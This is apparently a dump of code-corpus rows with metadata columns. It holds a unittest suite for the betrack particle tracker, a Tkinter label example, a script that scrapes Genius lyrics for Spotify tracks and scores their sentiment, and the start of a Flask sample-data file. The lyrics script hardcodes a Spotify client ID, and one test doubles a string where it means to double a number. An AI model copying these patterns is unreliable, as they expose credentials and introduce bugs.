cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
tp.export_video(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].avitracked))
self.assertEqual(dirname(realpath(tp.jobs[0].avitracked)),
dirname(realpath(self._vf.name)))
tp.jobs[0].release_memory()
remove(tp.jobs[0].avitracked)
remove(cf.name)
def test_run(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' period-frame: [0, 100]\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' crop-margins: [0, 2000, 0, 2000]\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
rval = tp.run()
self.assertEqual(rval, EX_OK)
remove(cf.name)
remove(tp.jobs[0].avitracked)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' crop-margins: [0, 2000, 0, 2000]\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
rval = tp.run()
self.assertEqual(rval, EX_CONFIG)
remove(cf.name)
| #------------------------------------------------------------------------------#
# Copyright 2018 <NAME>. All rights reserved. Use of this source #
# code is governed by a MIT license that can be found in the LICENSE file. #
#------------------------------------------------------------------------------#
"""
Tests for module `betrack.commands.trackparticles`.
"""
try:
from os import EX_OK, EX_CONFIG
except ImportError:
EX_OK = 0
EX_CONFIG = 78
from unittest import TestCase, skip
from tempfile import NamedTemporaryFile
from os import remove, name
from os.path import isfile, dirname, realpath
from cv2 import VideoWriter, VideoWriter_fourcc
from numpy import arange, array, zeros, uint8
from betrack.commands.trackparticles import *
class TestTrackParticles(TestCase):
@classmethod
def setUpClass(cls):
# Create temporary video file..
cls._vf = NamedTemporaryFile(mode='w', suffix='.avi', delete=False)
cls._vf.close()
cls._nframes = 10
cls._pdiameter = 11 # Must be odd!
cls._nparticles = 5
cls._voffset = 100
cls._hoffset = 10
codec = VideoWriter_fourcc('M', 'J', 'P', 'G')
cls._framerate = cls._nframes
cls._frameshape = (1000, 1000, 3)
oshape = cls._frameshape[0:2][::-1]
writer = VideoWriter(cls._vf.name, codec, cls._framerate, oshape)
for i in arange(0, cls._nframes):
f = zeros(cls._frameshape, dtype=uint8)
for p in arange(0, cls._nparticles):
pr = int(cls._pdiameter/2)
y = cls._voffset * (p + 1)
y = arange(y - pr, y + pr + 1)
x = cls._voffset + cls._hoffset * (i + 1)
x = arange(x - pr, x + pr + 1)
f[y, x, 1] = 255
f = array(f)
writer.write(f)
writer.release()
@classmethod
def tearDownClass(cls):
# Remove temporary file..
if name != 'nt': remove(cls._vf.name)
def test_configure_tracker(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-exportas: excel')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 12')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('jobs:')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-featuresdark: 11\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-minmass: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-maxsize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-separation: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-noisesize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-smoothingsize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-threshold: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-percentile: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-topn: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-preprocess: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-memory: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-predict: yep\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-adaptivestop: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-adaptivestep: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-st-threshold: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-cl-quantile: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-cl-threshold: 0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('jobs:\n')
cf.write(' - video: dummy.avi\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
def test_locate_features(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset) * 2 + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
self.assertEqual(tp.jobs[0].outdir, dirname(realpath(self._vf.name)))
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].h5storage))
self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
dirname(realpath(self._vf.name)))
with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
res = sf.dump()
self.assertEqual(res.shape, (self._nframes * self._nparticles, 9))
tp.jobs[0].release_memory()
remove(cf.name)
def test_link_trajectories(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].h5storage))
self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
dirname(realpath(self._vf.name)))
with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
res = sf.dump()
self.assertEqual(res.shape, (self._nframes * self._nparticles, 10))
self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
tp.jobs[0].release_memory()
remove(cf.name)
def test_filter_trajectories(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('tp-filter-cl-threshold: 200\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
tp.filter_trajectories(tp.jobs[0])
self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
tp.jobs[0].release_memory()
remove(cf.name)
def test_export_video(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
tp.export_video(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].avitracked))
self.assertEqual(dirname(realpath(tp.jobs[0].avitracked)),
dirname(realpath(self._vf.name)))
tp.jobs[0].release_memory()
remove(tp.jobs[0].avitracked)
remove(cf.name)
def test_run(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' period-frame: [0, 100]\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' crop-margins: [0, 2000, 0, 2000]\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
rval = tp.run()
self.assertEqual(rval, EX_OK)
remove(cf.name)
remove(tp.jobs[0].avitracked)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' crop-margins: [0, 2000, 0, 2000]\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
rval = tp.run()
self.assertEqual(rval, EX_CONFIG)
remove(cf.name)
| en | 0.461779 | #------------------------------------------------------------------------------# # Copyright 2018 <NAME>. All rights reserved. Use of this source # # code is governed by a MIT license that can be found in the LICENSE file. # #------------------------------------------------------------------------------# Tests for module `betrack.commands.trackparticles`. # Create temporary video file.. # Must be odd! # Remove temporary file.. | 1.9651 | 2 |
TkInter/Label/main.py | kuhakuu04/Python_PyQt5_GUI | 0 | 6612399 | <filename>TkInter/Label/main.py
import tkinter
# buat dulu frame-nya
frame = tkinter.Tk()
frame.title("Tkinter Frame 1")
# terus buat button-nya dan masukin ke dalam frame
button = tkinter.Label(frame, text="hello world")
button.pack()
# biar dia keluar dia harus di looping
frame.mainloop() | <filename>TkInter/Label/main.py
import tkinter
# buat dulu frame-nya
frame = tkinter.Tk()
frame.title("Tkinter Frame 1")
# terus buat button-nya dan masukin ke dalam frame
button = tkinter.Label(frame, text="hello world")
button.pack()
# biar dia keluar dia harus di looping
frame.mainloop() | id | 0.790498 | # buat dulu frame-nya # terus buat button-nya dan masukin ke dalam frame # biar dia keluar dia harus di looping | 3.795753 | 4 |
docs/report/fa20-523-341/project/code/get_music_data.py | mikahla1/cybertraining-dsc.github.io | 4 | 6612400 | import csv
import os
import re
import spotipy # library for interacting with spotify api
from spotipy.oauth2 import SpotifyClientCredentials # handles oath sign in with spotify api credentials
import requests # make http requests
from bs4 import BeautifulSoup # read page content from when opening genius urls
import nltk # nlp library
from nltk.sentiment.vader import SentimentIntensityAnalyzer # module for sentiment analysis
from nltk.corpus import stopwords # used to remove common words like 'the, at, and' from lyrics
nltk.download('vader_lexicon')
nltk.download('stopwords')
# search for a song on genius with song title and artist name, returns url to lyrics page for the song
def get_genius_url(title, artist):
genius = 'https://api.genius.com/search'
data = {'q': title + ' ' + artist}
headers = {'Authorization': 'Bearer ' + '<KEY>'}
response = requests.get(genius, data=data, headers=headers)
song_url = ''
for hit in response.json()['response']['hits']:
if artist == hit['result']['primary_artist']['name']:
# print(title + '|' + artist)
song_url = hit['result']['url']
break
return song_url
# parse lyrics page for lyrics, returns lyrics
def get_genius_lyrics_from_url(genius_url):
lyrics = requests.get(genius_url)
html = BeautifulSoup(lyrics.text, 'html.parser')
genius_lyrics = html.find('div', class_='lyrics').get_text()
return genius_lyrics
# cleans up song lyrics, removing empty lines, section headings, and any data that is not lyrical content
def lyrical_analysis(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', '', line)
filtered += line + '\n'
cleaned_lyrics = os.linesep.join([line for line in filtered.splitlines() if line])
sia = SentimentIntensityAnalyzer()
# object to return with sentiment data
senti_data = {}
# count for lines that are mostly positive, mostly negative, or mostly neutral
positive = 0
negative = 0
neutral = 0
# iterate line by line through lyrics, read line scores, judge positivity and update the respective count
for line in cleaned_lyrics.split('\n'):
line_sentiment = sia.polarity_scores(line)
score = line_sentiment['compound']
if score >= 0.5:
positive += 1
elif score < -0.1:
negative += 1
else:
neutral += 1
# small calculations to populate senti_data
total = positive + neutral + negative
senti_data['num_positive'] = positive
senti_data['num_negative'] = negative
senti_data['num_neutral'] = neutral
senti_data['positivity'] = positive / total
senti_data['negativity'] = negative / total
senti_data['neutrality'] = neutral / total
return senti_data
# count the number of unique words from tokanized array
def count_unique_words(array_of_words):
unique_words = []
for word in array_of_words:
if word not in unique_words:
unique_words.append(word)
return len(unique_words)
# remove common stopwords from lyrics, tokenize lyrics
def remove_stopwords(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', ' ', line)
filtered += line + 'n'
lyrics_words = re.split(r',| |_|-|!', filtered)
stops = stopwords.words('english')
removed_stopwords = [word for word in lyrics_words if word not in stops and word != '']
return removed_stopwords
def get_track_data(offset):
count = offset
# Dictionary to assign track IDs to the track names, for easy lookup
tracks = {}
# get top 50 songs in 2020
track_results = sp.search(q='year:2016', type='track', limit=50, offset=offset)
# populate tracks dictionary with track ids as keys, track names as values
for i, t in enumerate(track_results['tracks']['items']):
tracks[t['id']] = [t['name'], t['artists'][0]['name']]
# get audio data for each track in tracks
audio_data = sp.audio_features(tracks.keys())
# get lyrical data from for each song
for record in audio_data:
try:
print(str(count) + '/1998 songs looked up')
print(tracks[record['id']][0] + " | " + tracks[record['id']][1])
# store song name and artist name in audio_data
record['name'] = tracks[record['id']][0]
record['artist'] = tracks[record['id']][1]
# fetch url to lyrics page for song
url = get_genius_url(record['name'], record['artist'])
# if url exists, perform lyrical analyses. add lyrical information to the audio data already contained in audio_data
if url != '':
lyrics = get_genius_lyrics_from_url(url)
sentiment_data = lyrical_analysis(lyrics)
record['num_positive'] = sentiment_data['num_positive']
record['num_negative'] = sentiment_data['num_negative']
record['num_neutral'] = sentiment_data['num_neutral']
record['positivity'] = sentiment_data['positivity']
record['negativity'] = sentiment_data['negativity']
record['neutrality'] = sentiment_data['neutrality']
lyrics = remove_stopwords(lyrics)
record['word_count'] = len(lyrics)
record['unique_word_count'] = count_unique_words(lyrics)
else:
record['word_count'] = 0
count += 1
except Exception as e:
print(record)
# return array of song data of songs that were successfully analyzed
return [track for track in audio_data if (hasattr(track, 'word_count') and track['word_count'] != 0)]
# API Tokens
clientID = '688f828e787d49768560dc3b01ad1527'
clientSecret = '<KEY>'
credentialsManager = SpotifyClientCredentials(client_id=clientID, client_secret=clientSecret)
sp = spotipy.Spotify(client_credentials_manager=credentialsManager)
data_to_save = []
for num in range(0, 1998, 50):
for track_data in get_track_data(num):
data_to_save.append(track_data)
fields = data_to_save[0].keys()
with open('./data/tracks2016.csv', 'w') as data_file:
writer = csv.DictWriter(data_file, fieldnames=fields)
writer.writeheader()
writer.writerows(data_to_save)
print(data_to_save)
print('Length of data_to_save: ' + str(len(data_to_save)))
| import csv
import os
import re
import spotipy # library for interacting with spotify api
from spotipy.oauth2 import SpotifyClientCredentials # handles oath sign in with spotify api credentials
import requests # make http requests
from bs4 import BeautifulSoup # read page content from when opening genius urls
import nltk # nlp library
from nltk.sentiment.vader import SentimentIntensityAnalyzer # module for sentiment analysis
from nltk.corpus import stopwords # used to remove common words like 'the, at, and' from lyrics
nltk.download('vader_lexicon')
nltk.download('stopwords')
# search for a song on genius with song title and artist name, returns url to lyrics page for the song
def get_genius_url(title, artist):
genius = 'https://api.genius.com/search'
data = {'q': title + ' ' + artist}
headers = {'Authorization': 'Bearer ' + '<KEY>'}
response = requests.get(genius, data=data, headers=headers)
song_url = ''
for hit in response.json()['response']['hits']:
if artist == hit['result']['primary_artist']['name']:
# print(title + '|' + artist)
song_url = hit['result']['url']
break
return song_url
# parse lyrics page for lyrics, returns lyrics
def get_genius_lyrics_from_url(genius_url):
lyrics = requests.get(genius_url)
html = BeautifulSoup(lyrics.text, 'html.parser')
genius_lyrics = html.find('div', class_='lyrics').get_text()
return genius_lyrics
# cleans up song lyrics, removing empty lines, section headings, and any data that is not lyrical content
def lyrical_analysis(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', '', line)
filtered += line + '\n'
cleaned_lyrics = os.linesep.join([line for line in filtered.splitlines() if line])
sia = SentimentIntensityAnalyzer()
# object to return with sentiment data
senti_data = {}
# count for lines that are mostly positive, mostly negative, or mostly neutral
positive = 0
negative = 0
neutral = 0
# iterate line by line through lyrics, read line scores, judge positivity and update the respective count
for line in cleaned_lyrics.split('\n'):
line_sentiment = sia.polarity_scores(line)
score = line_sentiment['compound']
if score >= 0.5:
positive += 1
elif score < -0.1:
negative += 1
else:
neutral += 1
# small calculations to populate senti_data
total = positive + neutral + negative
senti_data['num_positive'] = positive
senti_data['num_negative'] = negative
senti_data['num_neutral'] = neutral
senti_data['positivity'] = positive / total
senti_data['negativity'] = negative / total
senti_data['neutrality'] = neutral / total
return senti_data
# count the number of unique words from tokanized array
def count_unique_words(array_of_words):
unique_words = []
for word in array_of_words:
if word not in unique_words:
unique_words.append(word)
return len(unique_words)
# remove common stopwords from lyrics, tokenize lyrics
def remove_stopwords(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', ' ', line)
filtered += line + 'n'
lyrics_words = re.split(r',| |_|-|!', filtered)
stops = stopwords.words('english')
removed_stopwords = [word for word in lyrics_words if word not in stops and word != '']
return removed_stopwords
def get_track_data(offset):
count = offset
# Dictionary to assign track IDs to the track names, for easy lookup
tracks = {}
# get top 50 songs in 2020
track_results = sp.search(q='year:2016', type='track', limit=50, offset=offset)
# populate tracks dictionary with track ids as keys, track names as values
for i, t in enumerate(track_results['tracks']['items']):
tracks[t['id']] = [t['name'], t['artists'][0]['name']]
# get audio data for each track in tracks
audio_data = sp.audio_features(tracks.keys())
# get lyrical data from for each song
for record in audio_data:
try:
print(str(count) + '/1998 songs looked up')
print(tracks[record['id']][0] + " | " + tracks[record['id']][1])
# store song name and artist name in audio_data
record['name'] = tracks[record['id']][0]
record['artist'] = tracks[record['id']][1]
# fetch url to lyrics page for song
url = get_genius_url(record['name'], record['artist'])
# if url exists, perform lyrical analyses. add lyrical information to the audio data already contained in audio_data
if url != '':
lyrics = get_genius_lyrics_from_url(url)
sentiment_data = lyrical_analysis(lyrics)
record['num_positive'] = sentiment_data['num_positive']
record['num_negative'] = sentiment_data['num_negative']
record['num_neutral'] = sentiment_data['num_neutral']
record['positivity'] = sentiment_data['positivity']
record['negativity'] = sentiment_data['negativity']
record['neutrality'] = sentiment_data['neutrality']
lyrics = remove_stopwords(lyrics)
record['word_count'] = len(lyrics)
record['unique_word_count'] = count_unique_words(lyrics)
else:
record['word_count'] = 0
count += 1
except Exception as e:
print(record)
# return array of song data of songs that were successfully analyzed
return [track for track in audio_data if (hasattr(track, 'word_count') and track['word_count'] != 0)]
# API Tokens
clientID = '688f828e787d49768560dc3b01ad1527'
clientSecret = '<KEY>'
credentialsManager = SpotifyClientCredentials(client_id=clientID, client_secret=clientSecret)
sp = spotipy.Spotify(client_credentials_manager=credentialsManager)
data_to_save = []
for num in range(0, 1998, 50):
for track_data in get_track_data(num):
data_to_save.append(track_data)
fields = data_to_save[0].keys()
with open('./data/tracks2016.csv', 'w') as data_file:
writer = csv.DictWriter(data_file, fieldnames=fields)
writer.writeheader()
writer.writerows(data_to_save)
print(data_to_save)
print('Length of data_to_save: ' + str(len(data_to_save)))
| en | 0.895162 | # library for interacting with spotify api # handles oath sign in with spotify api credentials # make http requests # read page content from when opening genius urls # nlp library # module for sentiment analysis # used to remove common words like 'the, at, and' from lyrics # search for a song on genius with song title and artist name, returns url to lyrics page for the song # print(title + '|' + artist) # parse lyrics page for lyrics, returns lyrics # cleans up song lyrics, removing empty lines, section headings, and any data that is not lyrical content # object to return with sentiment data # count for lines that are mostly positive, mostly negative, or mostly neutral # iterate line by line through lyrics, read line scores, judge positivity and update the respective count # small calculations to populate senti_data # count the number of unique words from tokanized array # remove common stopwords from lyrics, tokenize lyrics # Dictionary to assign track IDs to the track names, for easy lookup # get top 50 songs in 2020 # populate tracks dictionary with track ids as keys, track names as values # get audio data for each track in tracks # get lyrical data from for each song # store song name and artist name in audio_data # fetch url to lyrics page for song # if url exists, perform lyrical analyses. add lyrical information to the audio data already contained in audio_data # return array of song data of songs that were successfully analyzed # API Tokens | 3.048374 | 3 |
app_api/test1.py | yanghuizhi/Flask_Learn_YHZ | 0 | 6612401 | <reponame>yanghuizhi/Flask_Learn_YHZ
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: yanghuizhi
# Time: 2022/2/22 20:13
from flask import jsonify
from app_api import app_api as app
data = [
{"id": 1, "username": "小明", "password": "<PASSWORD>", "role": 0, "sex": 0, "telephone": "10086", "address": "北京市海淀区"},
{"id": 2, "username": "李华", "password": "<PASSWORD>", "role": 1, "sex": 0, "telephone": "10010", "address": "广州市天河区"},
